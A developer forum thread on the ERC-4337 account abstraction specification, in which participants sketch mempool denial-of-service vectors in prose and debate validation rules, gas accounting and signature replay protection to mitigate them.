ERC 4337: Account Abstraction via Entry Point Contract specification

@tjade273 thinking some more about value-bearing calls, I realized that our current protection (dropping validations that change any account balance except the wallet and the entry point) is not good enough. The value-bearing call you suggested could be a self-call by some 3rd party account, so there’s no balance change. So the current protection won’t stop this DoS:

  1. Wallets call EvilContract.func() during validation.
  2. EvilContract.func() attempts to call its own receive function with 1 wei, reverting if it fails. When it has 1 wei it is not caught by the current protection because the balance remains 1 wei.
  3. Attacker sends ops from 1000 wallets with this validation function while EvilContract has 1 wei. Validations succeed and the ops are accepted to the mempool.
  4. Attacker tells EvilContract to send the 1 wei elsewhere.
  5. All ops fail validation in the 2nd simulation.

We’ll update the EIP to also ban value-bearing calls during validation, except from the wallet to the entry point.

Thanks again for your valuable comments.

@yoavw yes, this is essentially the attack I had in mind. I assumed that executing a value-bearing call in some sense triggered the

does not access mutable state of any contract except the wallet itself

in your last post but yes it bears being specific that this applies also to implicit reads via value-bearing calls.

Another interesting corner case I’ve been thinking about is:

Wallet calls C1, passing it say 500 gas. C1 attempts to call C2 (which just returns immediately). Since gas cost for first accesses is metered at a higher rate, the call to C1 succeeds exactly when C2 has been accessed before. So in simulation if the calls are simulated separately as they arrive at the mempool, they will behave differently from when they are all run together.

It seems like this can be used to form a large scale DoS, unless all the userOps are simulated together in a batch (is this the case?).

1 Like

The ops are also simulated together as eth_estimateGas of the entire handleOps transaction, but we do try to avoid cases where this simulation fails, because it creates more work. If it does fail, the simulation returns the index of the op in the bundle as an arg of the FailedOp error, and the bundler removes this op.

The method you described would indeed pass the single-op simulation and then fail the eth_estimateGas, which will cause it to revert with a FailedOp and specify that op and retry.

It’s not as effective as the previous attack (value-bearing self calls) since it only invalidates ops in the current bundle rather than the entire mempool, and the attacker ends up paying for the first op in every bundle because this one is valid and not removed. But it is still a nuisance to the bundler which has to eth_estimateGas multiple times and only gets paid for one valid op.

I wonder if we should mitigate. We could require all calls during validation to provide max gas, which would prevent this vector and hopefully shouldn’t break any valid use case. On the other hand, the attack doesn’t scale well for the attacker because it only causes some off-chain work while paying on-chain costs in each bundle. What do you think?

The attacker may be able to get away with less than 1 successful op per batch if they test for previous accesses to an account that is likely to be called regardless of the attacker’s userVerify activity.

For example, a common paymaster that is likely to be used early in the batch, or even the externally owned account of the bundler themselves.

I’m trying to reason through the expected burden on a bundler due to this: is there any rate-limiting we can do to prevent users from filling up the mempool with a huge number of these invalid userOps? If the attacker sends 100k requests with the same wallet but different nonces, do these all get added to the mempool and crowd out real transactions? If so, maybe some sort of wallet blacklisting is warranted.

No, each wallet can only have one op in mempool at a time. The attacker needs to use 100k contract wallets in order to send 100k concurrent ops.

But… it may be possible to implement your attack without actually paying for these deployments. When a new wallet is deployed via EntryPoint, its validation is immediately called and the deployment is reverted if validation fails. You could craft a wallet that almost always reverts its own deployment op, costing the attacker nothing.

So you convinced me, we should add a max-gas rule during validation. We already require the use of fixed gas since we ban the GAS opcode, so we might as well require it to be max.

Thanks & keep them coming! :slight_smile:

1 Like

I think even with the max gas limitation there’s a similar issue.

The attacker just needs to calculate and set the verificationGas such that C1 runs out of gas only when address C2 is not primed. Then if the call to C1 fails, pay the EntryPoint and if it succeeds, revert. There should be enough gas left over for this due to the 63/64ths rule (we can make the leftover gas as large as necessary by burning a bunch in C1).

One potential mitigation is to simulate the operation, then resimulate it with all of the called addresses primed, and make sure the contract pays in both cases.

Alternatively you could disallow all reverted calls, or just OOG calls, in the stack. This should work since the “real life” calls will always take at most as much gas as the simulated calls, so if no calls run out of gas in the simulation then they shouldn’t in “real life” either.

I’m not sure the 63/64 rule leaves enough gas to do anything in this case, since nodes won’t accept a high verificationGas op due to the risk of unpaid work. But you’re right, there’s a risk that this could be exploited, and the max gas change doesn’t mitigate it.

That won’t solve the problem either, because the contract could use a combination, expecting some addresses to be primed and others not. E.g. succeed if no addresses are primed or all addresses are primed, but fail if 2 are and 3 aren’t.

I think this is the way to go. The client should drop the op if there’s an OOG revert in any context. Thanks for suggesting that.

PEEPanEIP-4337: Account Abstraction via Entry Point Contract specs. with @yoavw @kristofgazso

1 Like

Reference to another great presentation about this proposal:

Slides: ETHAmsterdam ERC 4337 - Google Slides

Main links from the slides:
Contract code: account-abstraction/contracts at main · eth-infinitism/account-abstraction · GitHub
Audit blog post: EIP-4337 - Ethereum Account Abstraction Audit - OpenZeppelin blog

4 Likes

Do I get it right from the implementation here that:

  1. The user is required to have a prefund of callGas + verificationGas + preVerificationGas. Link. (Let’s discuss only the case when without the paymaster).
  2. At the same time, verification is allowed to consume the entire verification gas. Link.
  3. Also, the execution is allowed to consume the entire callGas. Link.
  4. The preVerificationGas is always paid entirely as it takes into account gas needed for posting calldata etc. Link.

These parameters do not take into account additional overhead for creating auxiliary variables on the stack, etc. The preGas variables carry this overhead and is taken into account when paying fees for the beneficiary.

It seems like it is possible that the user’s operation consumes the entire verificationGas and executionGas, and so the user does not pay for the overhead mentioned above (e.g. these operations are done at the expense of the EntryPoint contract).

The code is taken from the OpenZeppelin’s report.

The preVerificationGas is supposed to cover this (yes, its name is a bit misleading)
We assume that all the variable costs are calculated using the “gas diffs” and that the overheads you describe are constants, and thus can be calculated by the bundler, to verify the preVerificationGas pays for them.

Thank you @dror for your response. Could you please help me with what step of reasoning am I wrong here (let’s assume that the tx was successful and there is no paymaster):

  1. Here we create UserOpInfo with preOpGas being equal to op.preVerificationGas + preGas - gasleft(). Let’s call say that preGas - gasleft() = op.verificationGas + k , where k is some constant. That means that preOpGas = op.preVerificationGas + op.verificationGas + k.
  2. Here when actually execute the tx, the actual cost is returned. The preOpGas is added to it, and so, in the worst case, the returned actual gas is equal to at least op.callGas + preOpGas = op.callGas + op.preVerificationGas + op.verificationGas + k.

The refund that the user was required to have at the start of the transaction is op.callGas + op.preVerificationGas + op.verificationGas, but the actual gas spent was op.callGas + op.preVerificationGas + op.verificationGas + k. The question is, who pays for k? From here we subtract the actualGasCost from prefund, so if the prefund is smaller than the actual gas cost, then the transaction will revert.

Indeed, the EntryPoint will not lose any money, but the operator should always remember that the operation is never guaranteed to succeed unless the verification step took so little amount of gas that the difference is enough to compensate for the k

The EIP states that:

To prevent replay attacks (both cross-chain and multiple EntryPoint implementations), the signature should depend on chainid and the EntryPoint address.

This makes sense given EIP-155.

Just so it’s clear for me, the reason the EIP doesn’t define how this signature is calculated over the data is because any signing and hashing algorithm (within reason) can be used?

For example, to calculate the hash of a message before creating a signature in Ethereum it is common to do the following:

Keccak256("\x19Ethereum Signed Message:\n32" + Keccak256(message))

So is the reason this ERC isn’t prescriptive like the example above due to the flexibility it offers with respect to crypto algorithms?

Therein, the validateUserOp on the wallet contract must make sure that it’s accounting for the chainId and the EntryPoint (as well as the UserOperation) when checking the signatures validity.

Minor comment: I think a more descriptive term for “paymaster” can be “sponsor”.

4 Likes

Exactly. The wallet is the flexibility (and responsibility) to use whatever signature scheme.
The “SampleWallet” we provide use this EIP191 “Ethereum Signed Message” signature. We also add reference implementation that uses BLS signatures

Is the current draft (EIP-4337: Account Abstraction via Entry Point Contract specification) up to date? I’m working on implementing 4337, but I see some inconsistencies between the EIP and the EntryPoint implementation.

For example, the EIP states the following rule:

Any GAS opcode is followed immediately by one of { CALL, DELEGATECALL, CALLCODE, STATICCALL }.

however, in the implementation repository, the example contains the following code:

  //pay required prefund. make sure NOT to use the "gas" opcode, which is banned during validateUserOp
  // (and used by default by the "call")
  (bool success,) = payable(msg.sender).call{value : requiredPrefund, gas : type(uint).max}("");
  (success);
  //ignore failure (its EntryPoint's job to verify, not wallet.)

So is not clear if GAS is allowed or not (when used before CALL, DELECATECALL, etc.). This is an important detail because proxy contracts (see EIP-1167) use the GAS opcode when forwarding the call. If this exception to the rule doesn’t exist, then wallets that use these proxies wouldn’t be compatible.


An unrelated thing:

Also while simulating the op there are a list of rules the client must enforce, but I see CALL to external contracts is allowed as long as value = 0, I think this is not enough to stop a 3rd contract from invalidating a large set of user operations:

  1. During validation CALL address X with value = 0 and any data, address X is a non-deployed contract so it doesn’t have code, the call doesn’t fail.
  2. Deploy a contract at address X, the contract calls address Y and it reverts if the call doesn’t fail.
  3. Deploy a contract at address Y, the contract calls address Z and it reverts if the call doesn’t fail.
  4. This enables toggling an arbitrary number of operations between valid and invalid.

This can be built as an ever expanding chain of NOT gates, I think a way to mitigate this issue is adding a rule that during validation the wallet is not allowed to call addresses with empty code.

The latest changes haven’t been merged to the official repo yet. They’re mainly related to signature aggregation but contain a few other minor changes. It’ll be merged very soon. The place to see the latest pending changes is https://github.com/eth-infinitism/account-abstraction/blob/develop/eip/EIPS/eip-4337.md

It is allowed. GAS is a forbidden opcode but there’s an exception to allow it just before *CALL which immediately consume it from the stack. The rationale is that the code should not be able to access this information and change the flow based on it, but calls are fine. Since the GAS value is not available to the code, the only way it could affect the flow is if a function runs out of gas. But rule 7 precludes that, by banning out-of-gas calls:

  1. No CALL, DELEGATECALL, CALLCODE, STATICCALL results in an out-of-gas revert.

So the exception described in the EIP is the correct one. The EntryPoint code also doesn’t enforce it since it’s handled by the bundler. What’s wrong is the comment in the code, which doesn’t mention the *CALL exception.

At that point rule 9 kicks in:

  1. EXTCODEHASH of every address accessed (by any opcode) does not change between first and second simulations of the op.

Any op that accesses address X gets dropped from mempool without simulation. What the EIP tries to avoid is having to resimulate a large number of ops in order to drop them. During the first simulation, the bundler saves a list of accessed addresses. Since any code change would trigger rule 9, these ops would be invalidated without additional work.

That actually wouldn’t mitigate the issue, since the contract at address X can be selfdestructed and redeployed differently each time by using some well known constructor tricks. The attack would start with a contract that doesn’t revert at address X, then toggle it by selfdestructing and recreating (in a single transaction) in order to invalidate a large number of ops. But I think rule 9 above does offer sufficient mitigation. Do you see a way around it?

1 Like

What’s stopping the wallet from re-broadcasting the transaction? you could mutate the transaction a bit, and re-broadcast, thus spamming the mempool without any additional costs. I assume the the client can block the wallet, but then a sort of “per-wallet reputation” starts to play out too.

Yes, but I’m assuming that SELFDESTRUCT will get deactivated soon enough.

We’d rather avoid per-wallet reputation. We only have that for paymasters. But this attack does have a cost to the attacker, probably higher than the damage it causes. In order to propagate through the mempool, the op must be valid at the time of propagation. The attacker has to invalidate it after it has been propagated, by deploying a contract. The attacker also has to deploy a large number of wallets in order to fill the mempool, because each wallet can have only one op in the mempool at any given time.

So the attacker has a one-time setup cost of O(concurrent_ops) for setting up the wallets, and then O(iterations) for deploying a new contract on each iteration. And the damage is a single off-chain simulation for each iteration of the attack, since the 2nd simulation never happens due to rule 9.

I agree it would be better to mitigate it entirely, rather than relying on the cost and unprofitability of the attack. But how would you block it without breaking too much functionality? Preventing calls to accounts without code is a good idea and shouldn’t break anything, but doesn’t block the attack due to selfdestruct and recreate.

It’ll be deactivated, but I don’t know about “soon enough”. We did consider having a rule where contracts touched during validation must not have the selfdestruct opcode, but it wasn’t good enough because the contract could delegatecall to an unknown address (specified in the op rather than in the code), and that address could selfdestruct. Preventing delegatecall to unknown addresses seems too harsh.

1 Like